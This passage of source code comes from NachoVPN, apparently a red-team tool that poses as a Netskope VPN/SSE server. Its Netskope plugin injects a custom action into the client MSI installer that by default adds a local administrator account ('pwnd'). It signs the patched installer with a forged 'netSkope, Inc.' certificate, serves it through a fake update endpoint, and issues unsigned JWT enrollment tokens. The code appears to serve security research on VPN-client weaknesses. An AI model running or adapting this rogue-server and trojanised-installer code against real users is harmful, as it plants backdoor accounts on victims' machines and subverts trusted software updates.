logging.info(f"ExamplePlugin::handle_data: Received data from {client_ip}: {data.hex()}") client_socket.sendall(b"PONG\n") return True ================================================ FILE: src/nachovpn/plugins/netskope/__init__.py ================================================ from .plugin import NetskopePlugin __all__ = [ 'NetskopePlugin' ] ================================================ FILE: src/nachovpn/plugins/netskope/plugin.py ================================================ from nachovpn.plugins import VPNPlugin from flask import Response, abort, request, send_file, jsonify from nachovpn.plugins.paloalto.msi_patcher import get_msi_patcher import subprocess import shutil import os import time import jwt import random import string import hashlib import base64 from cryptography import x509 from cryptography.x509.oid import NameOID from cryptography.hazmat.primitives import hashes, serialization from cryptography.hazmat.primitives.asymmetric import padding from cryptography.hazmat.primitives.serialization import pkcs12 from datetime import datetime, timedelta, timezone from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.backends import default_backend from cryptography.x509.oid import NameOID, ExtendedKeyUsageOID, ObjectIdentifier class NetskopePlugin(VPNPlugin): def __init__(self, *args, **kwargs): # provide the templates directory relative to this plugin super().__init__(*args, **kwargs, template_dir=os.path.join(os.path.dirname(__file__), 'templates')) # Payload storage self.payload_dir = os.path.join(os.getcwd(), 'payloads') self.files_dir = os.path.join(os.path.dirname(__file__), 'files') self.cache_dir = os.path.join(os.getcwd(), 'cache') os.makedirs(self.payload_dir, exist_ok=True) os.makedirs(self.cache_dir, exist_ok=True) # Payload options self.msi_force_patch = os.getenv("NETSKOPE_MSI_FORCE_PATCH", False) self.msi_force_download = os.getenv("NETSKOPE_MSI_FORCE_DOWNLOAD", False) self.msi_add_file = os.getenv("NETSKOPE_MSI_ADD_FILE", None) self.msi_increment_version = os.getenv("NETSKOPE_MSI_INCREMENT_VERSION", True) self.msi_command = os.getenv( "NETSKOPE_MSI_COMMAND", r"net user pwnd Passw0rd123! /add && net localgroup administrators pwnd /add" ) # Certificate paths self.codesign_cert_path = os.path.join('certs', 'netskope-codesign.cer') self.codesign_key_path = os.path.join('certs', 'netskope-codesign.key') self.codesign_pfx_path = os.path.join('certs', 'netskope-codesign.pfx') # Tenant config self.tenant_config = { "orgkey": os.getenv("NETSKOPE_ORGKEY", self.random_string(20)), "tenant_id": os.getenv("NETSKOPE_TENANT_ID", self.random_int(1000, 9999)), "tenant_name": os.getenv("NETSKOPE_TENANT_NAME", "TestOrg"), "region": os.getenv("NETSKOPE_REGION", "eu"), "pop_name": os.getenv("NETSKOPE_POP_NAME", "UK-LON1"), "addon_manager_host": os.getenv("NETSKOPE_ADDON_MANAGER_HOST", self.dns_name), "enrollment_host": os.getenv("NETSKOPE_ENROLLMENT_HOST", self.dns_name), "addon_checker_host": os.getenv("NETSKOPE_ADDON_CHECKER_HOST", self.dns_name), "sf_checker_host": os.getenv("NETSKOPE_SF_CHECKER_HOST", self.dns_name), # sfchecker.goskope.com "npa_gateway_host": os.getenv("NETSKOPE_NPA_GATEWAY_HOST", self.dns_name), # gateway.npa.goskope.com "nsgw_host": os.getenv("NETSKOPE_NSGW_HOST", self.dns_name), # gateway-.eu.goskope.com "nsgw_backup_host": os.getenv("NETSKOPE_NSGW_BACKUP_HOST", self.dns_name), # gateway-backup-.eu.goskope.com "gslb_gateway_host": os.getenv("NETSKOPE_GSLB_GATEWAY_HOST", self.dns_name), # gateway.gslb.goskope.com "npa_host": os.getenv("NETSKOPE_NPA_HOST", self.dns_name), # ns-.nl-am2.npa.goskope.com "stitcher_host": os.getenv("NETSKOPE_STITCHER_HOST", self.dns_name), # stitcher.npa.goskope.com "dp_gateway_fqdn": os.getenv("NETSKOPE_DP_GATEWAY_FQDN", self.dns_name), # gateway-lon2.goskope.com "user_email": os.getenv("NETSKOPE_USER_EMAIL", "test.user@example.com"), "user_key": os.getenv("NETSKOPE_USER_KEY", self.random_string(20)), "client_version": os.getenv("NETSKOPE_CLIENT_VERSION", "200.0.0.2272"), "client_hash": self.random_hash("sha1"), } if not self.bootstrap(): self.logger.error(f"Failed to bootstrap. Disabling {self.__class__.__name__}") self.enabled = False def random_string(self, length=20): return ''.join(random.choices(string.ascii_uppercase + string.ascii_lowercase, k=length)) def random_int(self, min=1, max=10000): return random.randint(min, max) def random_hash(self, algorithm="md5"): h = hashlib.new(algorithm) h.update(self.random_string().encode()) return h.hexdigest().upper() def sign_msi_files(self): if not os.path.exists(self.codesign_cert_path): self.logger.error("Windows code signing certificate not found, skipping signing") return False if not os.path.exists(os.path.join(self.payload_dir, "STAgent.msi")): self.logger.error("MSI file not found, skipping signing") return False if os.name == "nt": self.logger.error("Windows MSI signing not supported yet") return False if not os.path.exists('/usr/bin/osslsigncode'): self.logger.error("osslsigncode not found, skipping signing") return False # Sign the MSI files for msi_file in ["STAgent.msi"]: input_file = os.path.join(self.payload_dir, msi_file) output_file = os.path.join(self.payload_dir, f"{msi_file}.signed") # Remove existing signed file if os.path.exists(output_file): os.remove(output_file) proc = subprocess.run([ "/usr/bin/osslsigncode", "sign", "-pkcs12", self.codesign_pfx_path, "-h", "sha256", "-in", input_file, "-out", output_file, ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode or not os.path.exists(output_file): self.logger.error(f"Failed to sign {msi_file}: {proc.returncode}") return False else: self.logger.info(f"Signed {msi_file}") os.replace(output_file, input_file) return True def verify_msi_files(self): # Verify that the MSI files are signed by our current CA if os.name == "nt": self.logger.error("Windows MSI verification not supported yet") return True if os.name == "posix" and not os.path.exists('/usr/bin/osslsigncode'): self.logger.error("osslsigncode not found, skipping verification") return True for msi_file in ["STAgent.msi"]: proc = subprocess.run([ "/usr/bin/osslsigncode", "verify", "-CAfile", self.cert_manager.ca_cert_path, "-in", os.path.join(self.payload_dir, msi_file), ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode: self.logger.error(f"Failed to verify {msi_file}: {proc.returncode}") return False self.logger.info("MSI file verified") return True def patch_msi_files(self): # Patch the msi files if os.path.exists(os.path.join(self.payload_dir, "STAgent.msi")) and \ not self.msi_force_patch and self.verify_msi_files(): self.logger.warning("MSI file already patched, skipping") return True if os.name == "posix" and not os.path.exists('/usr/bin/msidump'): self.logger.error("msitools not found, skipping patching") return True # Check if MSI files are present if not os.path.exists(os.path.join(self.files_dir, "STAgent.msi")): self.logger.warning(f"MSI file not found in files directory: {self.files_dir}") return False patcher = get_msi_patcher() for msi_file in ["STAgent.msi"]: # Copy default MSI file to payload directory input_file = os.path.join(self.files_dir, msi_file) output_file = os.path.join(self.payload_dir, msi_file) shutil.copy(input_file, output_file) # Add patches if self.msi_add_file: patcher.add_file(output_file, self.msi_add_file, self.random_hash(), "DefaultFeature") self.logger.info(f"Added file {self.msi_add_file} to {msi_file}") if self.msi_command: patcher.add_custom_action(output_file, f"_{self.random_hash()}", 50, "C:\\windows\\system32\\cmd.exe", f"/c {self.msi_command}", "InstallExecuteSequence") self.logger.info(f"Added custom action to {msi_file}") # Set the MSI version patcher.set_msi_version(output_file, self.tenant_config["client_version"]) self.logger.info(f"Set MSI version for {msi_file}") # Add CERT_DIGEST property # Not validated, but it's required by the STAgent service cert_digest = base64.b64encode(os.urandom(256)).decode() patcher.add_custom_property(output_file, "CERT_DIGEST", cert_digest) self.logger.info(f"Added CERT_DIGEST property to {msi_file}") self.logger.info("MSI file patched") return True def get_org_cert(self): return self.get_ca_cert() def get_ca_cert(self): with open(self.cert_manager.ca_cert_path, 'r') as f: return f.read() def get_user_cert(self): # Generate a private key for the user certificate user_private_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) # Create the code signing certificate subject = x509.Name([ x509.NameAttribute(NameOID.COMMON_NAME, self.tenant_config["user_email"]), x509.NameAttribute(NameOID.ORGANIZATION_NAME, self.tenant_config["tenant_name"]), x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, os.urandom(16).hex()), x509.NameAttribute(NameOID.LOCALITY_NAME, "London"), x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, "GB"), x509.NameAttribute(NameOID.COUNTRY_NAME, "GB"), x509.NameAttribute(NameOID.EMAIL_ADDRESS, self.tenant_config["user_email"]), ]) eku_list = [ ExtendedKeyUsageOID.CLIENT_AUTH, ] key_usage = x509.KeyUsage( digital_signature=True, key_encipherment=True, content_commitment=False, data_encipherment=False, key_agreement=True, encipher_only=False, decipher_only=False, key_cert_sign=False, crl_sign=False ) builder = x509.CertificateBuilder().subject_name( subject ).issuer_name( self.cert_manager.ca_cert.subject ).public_key( user_private_key.public_key() ).serial_number( x509.random_serial_number() ).not_valid_before( datetime.now(timezone.utc) - timedelta(days=1) ).not_valid_after( datetime.now(timezone.utc) + timedelta(days=365) ).add_extension( x509.ExtendedKeyUsage(eku_list), critical=True, ).add_extension( key_usage, critical=True, ) # Sign the certificate with the CA private key user_certificate = builder.sign(self.cert_manager.ca_key, hashes.SHA256(), default_backend()) # Convert to pkcs12 user_p12 = serialization.pkcs12.serialize_key_and_certificates( b"user", user_private_key, user_certificate, None, serialization.NoEncryption()) self.logger.info(f"Generated user certificate for {self.tenant_config['user_email']}") return user_p12 def bootstrap(self): # Generate a Windows code signing certificate if not os.path.exists(self.codesign_cert_path) or not os.path.exists(self.codesign_key_path): self.cert_manager.generate_codesign_certificate( common_name="netSkope, Inc.", cert_path=self.codesign_cert_path, key_path=self.codesign_key_path, pfx_path=self.codesign_pfx_path ) # Load the CA certificate into the tenant config with open(self.cert_manager.ca_cert_path, 'r') as f: self.tenant_config["ca_certificate"] = f.read() # Patch the Windows MSI file and sign it if not self.patch_msi_files(): return False if not self.sign_msi_files(): return False return True def can_handle_http(self, handler): user_agent = handler.headers.get('User-Agent', '') if 'Netskope ST Agent' in user_agent or \ handler.path in ["/nsauth/client/authenticate", "/netskope/generate_command"]: return True return False def timestamp(self): return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z") def request_id(self): return base64.urlsafe_b64encode(os.urandom(15)).decode() def version_hex(self): return os.urandom(6).hex()[:5] def _setup_routes(self): # Call the parent class's route setup super()._setup_routes() @self.flask_app.route("/", methods=["GET"]) def index(): return jsonify({"access-method" : "Client"}) @self.flask_app.route("/v1/externalhost", methods=["GET"]) def externalhost(): data = { "status": "success", "hosts": { "enrollment": self.tenant_config["enrollment_host"] }, "enabled": "true" } return jsonify(data) @self.flask_app.route("/adconfig", methods=["GET"]) def adconfig(): return jsonify({"secureUPN": "0", "status": "success"}) @self.flask_app.route("/client/supportlogging", methods=["POST"]) def support_logging(): return jsonify({"status": "success"}) @self.flask_app.route("/config/user/getbrandingbyemail", methods=["GET"]) def getbrandingbyemail(): orgkey = request.args.get('orgkey', self.tenant_config["orgkey"]) data = { "AddonCheckerHost": self.tenant_config["addon_checker_host"], "AddonCheckerResponseCode": "netSkope@netSkope", "AddonManagerHost": self.tenant_config["addon_manager_host"], "EncryptBranding": False, "OrgKey": orgkey, "OrgName": self.tenant_config["tenant_name"], "SFCheckerHost": self.tenant_config["sf_checker_host"], "SFCheckerIP": "8.8.8.8", "UserEmail": self.tenant_config["user_email"], "UserKey": self.tenant_config["user_key"], "ValidateConfig": False, "status": "success", "tenantID": self.tenant_config["tenant_id"] } return jsonify(data) @self.flask_app.route("/v1/branding/tenant/", methods=["GET"]) def brandingtenant(tenant): jwt = request.headers.get('Authorization') data = { "encrypted": False, "nonce": "", "branding": { "AddonCheckerHost": self.tenant_config["addon_checker_host"], "AddonCheckerResponseCode": "netSkope@netSkope", "AddonManagerHost": self.tenant_config["addon_manager_host"], "EncryptBranding": False, "OrgKey": self.tenant_config["orgkey"], "OrgName": self.tenant_config["tenant_name"], "SFCheckerHost": self.tenant_config["sf_checker_host"], "SFCheckerIP": "8.8.8.8", "UserEmail": self.tenant_config["user_email"], "UserKey": self.tenant_config["user_key"], "ValidateConfig": False, "status": "success", "tenantID": self.tenant_config["tenant_id"] } } return jsonify(data) @self.flask_app.route("/v2/config/org/clientconfig", methods=["GET"]) def clientconfig(): userconfig = request.args.get('userconfig', "0") tenantconfig = request.args.get('tenantconfig', "0") data = {} if tenantconfig == "1": data = { "IDPModeOnlyIfConfigured": "0", "MDMSecureEnrollmentTokenEnabled": "1", "OverrideAccessMethodDetection": "0", "add_os_and_access_method_to_ssl_decryption": "1", "advance_firewall_enabled": "0", "alert_acknowledge": "0", "allowClientDisabling": "true", "allowIdPLogout": "false", "allowNpaDisabling": "true", "allowOnetimeClientDisabling": "0", "allow_autouninstall": "0", "alwaysOnDemandVPN": "0", "always_send_nsdeviceuid_new": "1", "always_send_nsdeviceuid_new_v2": "1", "android_chromeos_ns_client": "0", "app_instance_management_enabled": "0", "blockDnsTCP": "0", "blockIPv6": "0", "bwanclient": "0", "bwanenrollmenturl": "", "bypassApp": "1", "bypassLoopbackDNS": "1", "bypassOfficeAppsAtAndroidOS": "0", "bypassPacDownloadFlow": "0", "bypassPreferredIPv4macOS": "0", "bypassPrivateTrafficAtDriver": "0", "case_sensitive_groups": "0", "cert_pinned_app_decryption_enabled": "0", "cfg_ver_usr_update_check": "0", "checkCiscoVpn": "0", "checkSNI": "false", "check_msi_digest": "0", "clientAssistedGSLBGTM": "1", "clientAssistedGTM": "1", "clientEncryptBranding": "0", "clientHandleOverlappingDomains": "0", "clientStatusEnableBatching": "0", "clientStatusUpdate": { "heartbeatIntervalInMin": "30" }, "clientStatusUpdateIntervalInMin": "5", "clientUninstall": { "allowUninstall": "true" }, "clientUpdate": { "allowAutoGoldenUpdate": "false", "allowAutoUpdate": "true", "showUpdateNotification": "false", "updateIntervalInMin": "1" }, "client_config_post_v2": "0", "configUpdate": { "updateIntervalInMin": "1" }, "configurationName": "Test Client Configuration", "custom_email_sending_domain": "0", "dc_cert_check_crl_support_enabled": "0", "dc_cert_check_sc_support_enabled": "0", "dc_custom_label_enabled": "1", "debugSettings": "true", "demClientAppProbeLimit": "10", "demDeviceHealthIntervalInMin": "0", "demDpRouteControlCollectInterval": "0", "demStationAppProbeLimit": "30", "demTopConsumptionMetrics": "0", "dem_active_station_limit": "0", "dem_app_probes_max_limit": "0", "dem_custom_apps_max_limit": "0", "dem_network_path_probes_max_limit": "0", "demconfig_host": "", "dest-ip-policy": "0", "deviceUniqueID": "1", "device_admin": { "auto_start_prelogin_tunnel": "false", "cert_ca": [], "data": "", "prelogin_username": "", "show_prelogon_status": "true", "validate_crl": "false" }, "device_classification_av_os_checks_enabled": "1", "device_classification_cert_check_enabled": "0", "device_classification_ui_improvements": "1", "disableFirefoxPopup": "0", "disableJavaDnsCache": "0", "disableMacCannotAllocateCheck": "0", "disable_appssoagent_restart": "0", "dlp_unique_count_enabled": "1", "dns_custom_port": "0", "drop_svcb_dns_resolver_query": "1", "duplicateRccDataToGEF": "0", "dynamicSteering": "1", "dynamicSteeringImprovementEnabled": "1", "email_svc_v2_tenant_feature": "1", "enableAOACSupport": "1", "enableAirDropException": "0", "enableClientSelfProtection": "false", "enableDemClientStatus": "0", "enableDemHeartbeat": "1", "enableMacOSInterfaceBinding": "0", "enableMacPerformance": "0", "enableMacPerformance_v2": "0", "enableSaveBatteryForSleepMode": "0", "enableTLSKey": "0", "enableTunnelSessionNotFound": "0", "enableUpdatePropertyFrameSupport": "1", "enable_case_insensitivity": "0", "enable_dc_smart_card_insertion_detection": "0", "enable_deep_custom_category_fetching": "0", "enable_dem_npa_private_apps": "0", "enable_mongo_maria_sync_tenant": "1", "enable_scim_custom_attributes": "0", "enable_scim_custom_attributes_event_enrichment": "0", "enable_um_mongo_sync": "0", "encryptClientConfig": "0", "endpoint_dlp": "0", "endpoint_dlp_cd_dvd": "0", "endpoint_dlp_content_bluetooth": "0", "endpoint_dlp_content_network": "0", "endpoint_dlp_content_printer": "0", "endpoint_dlp_device_encryption": "0", "endpoint_dlp_enabled": "0", "endpoint_dlp_mac_bluetooth_device_control": "1", "endpoint_dlp_macos_content_control_settings": "0", "endpoint_dlp_ui_mip_profiles_warning": "0", "endpoint_dlp_ui_otp_enabled": "0", "enhancedCertPinnedApplist": "1", "enhanced_reports": "1", "enhanced_reports_feature_start_date": "2025-01-01 00:00:00", "enhanced_reports_migration_period": "90", "enhanced_reports_pre_migration_period": "90", "enhanced_reports_start_date": "2025-01-01 00:00:00", "epdlp_mp": "", "eventForwarderHost": "", "event_incident_enabled": "0", "ext_urp_enabled": "0", "externalProxy": [], "externalProxyConfig": "1", "failClose": { "captive_portal_timeout": "", "exclude_npa": "false", "fail_close": "false", "notification": "false" }, "fail_close_enabled": "1", "fast_fetch_enabled": "0", "featureActivationExpiry": "0", "feature_ios_client_download": "0", "feature_mongo_client_secondary_allowed": "0", "forward_to_proxy_settings": "0", "gslb": { "host": self.tenant_config["gslb_gateway_host"], "port": "443" }, "gsuite_mailclient_enabled": "0", "handleExceptionsAtDriver": "0", "handleSNIFromSegmentPacket": "0", "hideClientIcon": "false", "hide_client_after": "50", "ignoreInactiveSystemProxy": "0", "ignoreLoopbackProxy": "0", "ignore_cert_chain_certs": "1", "industry_comparison_enabled": "1", "injectAtTransportLayer": 0, "inline_policy_enhancements_enabled": "1", "interopProxy": { "host": "", "port": 0, "product": 0 }, "ios_vpn_mode": "1", "isClientSTA": "1", "large_file_support": "0", "linuxBypassRouteIPException": "0", "localTrafficBypass": "1", "logLevel": "info", "master_passcode_for_client_disablement": "0", "mdm_secure_enrollment": "1", "metrics": { "enable": "0" }, "mongo_user_info_flag": "1", "mtu": "1476", "ng_device_classification_enabled": "0", "notBypassBlockedCertpinnedAppOnSession0": "0", "npa": { "dnstcp_enabled": "1", "dtls_enabled": "0", "gslb": { "host": self.tenant_config["gslb_gateway_host"], "port": "443" }, "host": self.tenant_config["npa_gateway_host"], "keepalive_timeout": 15, "lb_host": "", "npa_local_broker_v1": "0", "port": 443, "port_bypass_enabled": "0", "rfc1918_enabled": "0", "tenant": self.tenant_config["npa_host"] }, "npa_4k_pvkey_cert": "0", "npa_appdiscovery_host_limit": "32", "npa_auth_client_enrollment_enabled": "0", "npa_client_allow_disable": "1", "npa_client_bypass_local_subnet_disabled": "0", "npa_client_compose_device_user_id": "0", "npa_client_l4": "0", "npa_client_use_cgnat": "0", "npa_docker_support": "0", "npa_enable_tls_cipher_aes128_only": "1", "npa_enable_wildcard_app_validation": "0", "npa_gslb_client": "0", "npa_gslb_client_no_fallback": "0", "npa_gslb_client_pop_count": "10", "npa_gslb_client_v2": "0", "npa_gslb_client_v3": "1", "npa_handle_dns_https_query": "0", "npa_lz4_support": "0", "npa_max_dns_search_domains": "0", "npa_srp_compress": "0", "npa_srpv2": "1", "npa_srpv2_configdist": "1", "nsclient_api_security_no_enc": "0", "nsgw": { "backupHost": self.tenant_config["nsgw_backup_host"], "host": self.tenant_config["nsgw_host"], "port": 443 }, "onpremcheck": { "onprem_additional_http_hosts": [], "onprem_additional_ips": [], "onprem_host": "", "onprem_http_host": "", "onprem_http_tcp_connection_timeout": "", "onprem_ip": "", "onprem_use_dns": "" }, "overrideUserDisableAfterLogin": "0", "partner_orange": "0", "pdem_subscription_level": "None", "policy_group_count_max": "1024", "postureValidation": { "periodic_validation_enabled": "true", "validation": { "interval": 60 } }, "posture_validation_enabled": "1", "prc_dp_geofence": "0", "prc_dp_npa_tenant": "0", "prc_dp_premium_npa_tenant": "0", "prc_dp_tenant": "0", "prelogin_enabled": "false", "premium_reports": "1", "premium_reports_licensing_status": "1", "premium_reports_licensing_status_start_date": "2025-01-01 00:00:00", "premium_reports_migration_period": "0", "premium_reports_ns_superadmin_access_only": "0", "premium_reports_trial_period": "0", "priority": 0, "privateApps": { "npa_vdi_support": "false", "npa_vdi_user": "", "partner_access": "false", "partner_tenant_access": "false", "partner_tenant_info": [], "primary_tenant_name": "", "reauth_enabled": "false", "seamless_policy_update": "true" }, "protocol": "dtls", "proxyAuth": "0", "proxy_chaining_enabled": "0", "publisher_selection": "0", "push_tenant_ca_cert_key": "1", "reconfigureUser": "1", "remove_source_steering_exception": "0", "reportClientStatus": "0", "scim_attribute_control": "0", "scim_delete_disabled_user": "1", "scim_group_members": "0", "scim_mongo_case_insensitive_query": "1", "scim_nested_group_support": "0", "secureAccess": "1", "secure_config_validation": "0", "secure_enrollment_encryption_token_enabled": "1", "secure_enrollment_multiple_token_support_enabled": "0", "secure_enrollment_token_decoupling_enabled": "1", "sendDeviceInfo": "false", "service_profile_v2_enabled": "0", "sfCheck": { "SFCheckerHost": self.tenant_config["sf_checker_host"], "SFCheckerIP": "8.8.8.8", "SFCheckerIP6": "2001:4860:4860:8888" }, "simple_client_notification_enabled": "1", "sites_enabled": "1", "steer_all_cloud_apps": "0", "steering_categories_api_v2": "0", "steering_config_2": "1", "steering_domains_api_v2": "0", "steering_dynamicdomains_api_v2": "0", "steering_dynamicexceptions_api_v2": "0", "steering_dynamicpinnedapps_api_v2": "0", "steering_exceptions_api_v2": "0", "steering_match_criteria_improvements": "0", "steering_orgpac_api_v2": "0", "steering_pac_api_v2": "0", "steering_pinnedapps_api_v2": "0", "steering_post_api_v2": "0", "steering_private_apps_api_v2": "0", "steering_v2_enabled": "0", "stopTunnelOnSleep": "0", "storage_constraint_profile_api_rate_limit": "10", "supportUDPExceptions": "0", "support_more_tlv": "1", "support_ou_group_exceptions": "1", "synchronous_scim_server": "1", "traffic_mode": "web", "transaction_logs_enabled": "1", "uba_enabled": "0", "um_api_service_migration_high_usage": "0", "um_api_service_migration_low_usage": "0", "um_api_service_migration_medium_usage": "0", "um_clear_all_cache_async": "0", "um_clear_steering_cache": "0", "unified_ios_client": "1", "urp_enabled": "0", "useConfigVersion": "0", "useSerialNumberAsHostname": "0", "useWebView2": "1", "use_custom_primary_identifier_user": "0", "userNotification": "1", "user_manager_api_enabled": "0", "user_manager_for_group_memberships": "0", "user_manager_object_lock": "0", "validate_email_format": "1", "validateusertenant": "0", "versioned_steering": "1" } elif userconfig == "1": data = { "autoUninstall": "0", "onpremcheck": { "onprem_additional_http_hosts": [], "onprem_additional_ips": [], "onprem_host": "", "onprem_http_host": "", "onprem_http_tcp_connection_timeout": "", "onprem_ip": "", "onprem_use_dns": "" }, "privateApps": { "reauth": { "grace_period": 0, "interval": 0 }, "reauth_enabled": "false" } } return jsonify(data) @self.flask_app.route("/config/getoverlappingdomainlist", methods=["GET"]) def getoverlappingdomainlist(): data = { "overlappingDomainList": { "1": [ "example.co.uk" ], "2": [ "example.net" ], "3": [ "example.org" ], "4": [ "example.com" ] }, "status": "OK" } return jsonify(data) @self.flask_app.route("/client/deviceclassification", methods=["POST"]) def deviceclassification(): data = { "status": "success", "latest_modified_time": self.timestamp(), "deviceClassification": [ [ "Test Laptops" ], [ -2 ] ] } return jsonify(data) @self.flask_app.route("/v2/update/clientstatus", methods=["POST"]) def clientstatus(): data = {"status": "success"} return jsonify(data) @self.flask_app.route("/v2/checkupdate", methods=["GET"]) def checkupdate(): os = request.args.get('os') client_hash = self.tenant_config["client_hash"] client_version = self.tenant_config["client_version"] data = {} if os == "win": data = { "version": client_version, "downloadurl": f"https://{self.dns_name}/dlr/{client_hash}?version={client_version}", "upload_timestamp": int(time.time()) } return jsonify(data) @self.flask_app.route("/api/clients", methods=["POST"]) def clients(): data = {"errors":["token jti not valid"]} return jsonify(data), 401 @self.flask_app.route("/api/v0.2/footprint/", methods=["GET", "POST"]) def footprint(id): data = {} # TODO: fetch or minimise this data if request.method == "GET": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "default", "version": self.version_hex(), "rtt_protocol": "tcp", "client_country": "GB", "pops": [ { "name": self.tenant_config["pop_name"], "distance": 10.91245919002901, "rtt_endpoints": [ { "ip": self.external_ip, "port": 443, "scheme": "http", "path": "/" }, ], "country": "GB", "in_country": True, "dp_gateway_fqdn": self.tenant_config["dp_gateway_fqdn"], "ip_address": self.external_ip } ] } elif request.method == "POST": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "default", "pops": [ { "name": self.tenant_config["pop_name"], "ip": self.external_ip } ] } return jsonify(data) @self.flask_app.route("/api/v0.2/npa/footprint/", methods=["GET", "POST"]) def npa_footprint(id): data = {} if request.method == "GET": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "npa", "version": self.version_hex(), "rtt_protocol": "tcp", "client_country": "GB", "pops": [ { "name": self.tenant_config["pop_name"], "distance": 10.91245919002901, "rtt_endpoints": [ { "ip": self.external_ip, "port": 443, "scheme": "http", "path": "/" }, { "ip": self.external_ip, "port": 443, "scheme": "http", "path": "/" } ], "country": "GB", "in_country": True, "npa_gateway_fqdn": self.tenant_config["npa_gateway_host"], "npa_stitcher_fqdn": self.tenant_config["stitcher_host"], "npa_gateway_ip": self.external_ip, "npa_stitcher_ip": self.external_ip } ] } elif request.method == "POST": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "npa", "pops": [ { "name": self.tenant_config["pop_name"], "npa_gateway_ip": self.external_ip, "npa_gateway_fqdn": self.tenant_config["npa_gateway_host"], "npa_stitcher_ip": self.external_ip, "npa_stitcher_fqdn": self.tenant_config["stitcher_host"], "country": "GB", "in_country": True } ] } return jsonify(data) @self.flask_app.route("/steering/categories", methods=["GET"]) def steering_categories(): data = { "status": "success", "steering_config_name": "Test Steering Configuration", "webcat_ids": [] } return jsonify(data) @self.flask_app.route("/v2/config/org/getmanagedchecks", methods=["GET"]) def getmanagedchecks(): data = { "device_classification_rules": { "win": { "domain_check": { "domains": [ "nachovpn.local" ] } } }, "latest_modified_time": self.timestamp() } return jsonify(data) @self.flask_app.route("/steering/pinnedapps", methods=["GET"]) def pinnedapps(): data = { "certPinnedAppList": [], "status": "success", "steering_config_name": "Test Steering Configuration" } return jsonify(data) @self.flask_app.route("/steering/exceptions", methods=["GET"]) def steering_exceptions(): data = { "fail_close": { "domains": [], "ips": [] }, "ips": [], "names": [], "protocols": {}, "status": "success", "steering_config_name": "Test Steering Configuration" } return jsonify(data) @self.flask_app.route("/config/org/cert", methods=["GET"]) def org_cert(): return Response(self.get_org_cert(), mimetype='application/x-pem-file', headers={'Content-Disposition': 'attachment; filename="cert.pem"'}) @self.flask_app.route("/config/ca/cert", methods=["GET"]) def ca_cert(): return Response(self.get_ca_cert(), mimetype='application/x-pem-file', headers={'Content-Disposition': 'attachment; filename="cert.pem"'}) @self.flask_app.route("/v2/config/user/cert", methods=["GET"]) def user_cert(): return Response(self.get_user_cert(), mimetype='application/x-pkcs12', headers={'Content-Disposition': 'attachment; filename="nsusercert.p12"'}) @self.flask_app.route("/v1/steering/domains", methods=["GET"]) def steering_domains(): data = { "bwan_apps_enabled": 0, "bwan_apps_off_prem": 0, "bwan_apps_on_prem": 0, "bypass_option": 0, "domain_ports": {}, "domains": [ self.tenant_config["addon_manager_host"], ], "dynamic_steering": 0, "offprem_bypass_option": 0, "offprem_steering_method": 0, "offprem_steering_method_none": 0, "onprem_bypass_option": 0, "onprem_steering_method": 0, "onprem_steering_method_none": 0, "private_apps_enabled": 1, "private_apps_enabled_specific": 0, "private_apps_off_prem": 0, "private_apps_off_prem_specific": 0, "private_apps_on_prem": 0, "private_apps_on_prem_specific": 0, "private_apps_other_steering_method": 0, "status": "success", "steering_config_name": "Test Steering Configuration", "steering_method_none": 0, "traffic_mode": "web" } return jsonify(data) @self.flask_app.route("/config/org/version", methods=["GET"]) def org_version(): return jsonify({"config_version": "2025-03-05 14:01:01.629725", "status": "success"}) @self.flask_app.route("/netskope/generate_command", methods=["GET"]) def generate_command(): """ Generate a JWT token for the enrollment request """ token = jwt.encode( { "Iss": "client", "iat": int(time.time()), "exp": int(time.time() + 3600), "UserEmail": self.tenant_config["user_email"], "OrgKey": self.tenant_config["orgkey"], "AddonUrl": self.tenant_config["addon_manager_host"], "TenantId": self.tenant_config["tenant_id"], "nbf": int(time.time() - 3600), "UTCEpoch": int(time.time()), }, key=b"", algorithm=None) command = { "148": { "tenantName": self.tenant_config["tenant_name"], "idpTokenValue": token } } return jsonify(command) @self.flask_app.route("/dlr/", methods=["GET"]) def download_client(download_hash): download_file = os.path.join(self.payload_dir, "STAgent.msi") if not os.path.exists(download_file): abort(404) return send_file(download_file, as_attachment=True) @self.flask_app.route('/nsauth/client/authenticate', methods=["POST", "GET"]) def authenticate(): token = jwt.encode( { "Iss": "authsvc", "OrgKey": self.tenant_config["orgkey"], "UserEmail": self.tenant_config["user_email"], "PopName": self.tenant_config["pop_name"], "TenantId": self.tenant_config["tenant_id"], "AddonUrl": self.tenant_config["addon_manager_host"], "UTCEpoch": int(time.time()), "nbf": int(time.time() - 3600), "exp": int(time.time() + 3600), "tenant_rotation_state": None, "rotateCert": False, }, key=b"", algorithm=None) html = self.render_template('auth.html', jwt_token=token) return Response(html, mimetype='text/html') @self.flask_app.route("/config/org/gettunnelpolicy", methods=["GET"]) def gettunnelpolicy(): return jsonify({"status":"success","tunnelPolicy":[]}) ================================================ FILE: src/nachovpn/plugins/netskope/templates/auth.html ================================================ Authentication Success

Authentication successful

Configuration will automatically be downloaded.

You are being redirected

================================================ FILE: src/nachovpn/plugins/paloalto/__init__.py ================================================ ================================================ FILE: src/nachovpn/plugins/paloalto/msi_downloader.py ================================================ import xml.etree.ElementTree as ET import argparse import requests import sys import os class MSIDownloader: def __init__(self, output_dir): self.xml_url = "https://pan-gp-client.s3.amazonaws.com" self.x86_msi = "GlobalProtect.msi" self.x64_msi = "GlobalProtect64.msi" self.output_dir = output_dir def get_latest_versions(self): response = requests.get(self.xml_url) response.raise_for_status() root = ET.fromstring(response.content) ns = {'s3': 'http://s3.amazonaws.com/doc/2006-03-01/'} contents = root.findall('.//s3:Contents', ns) x86_keys = [c.find('s3:Key', ns).text for c in contents if 'GlobalProtect.msi' in c.find('s3:Key', ns).text] x64_keys = [c.find('s3:Key', ns).text for c in contents if 'GlobalProtect64.msi' in c.find('s3:Key', ns).text] latest_version_x86 = 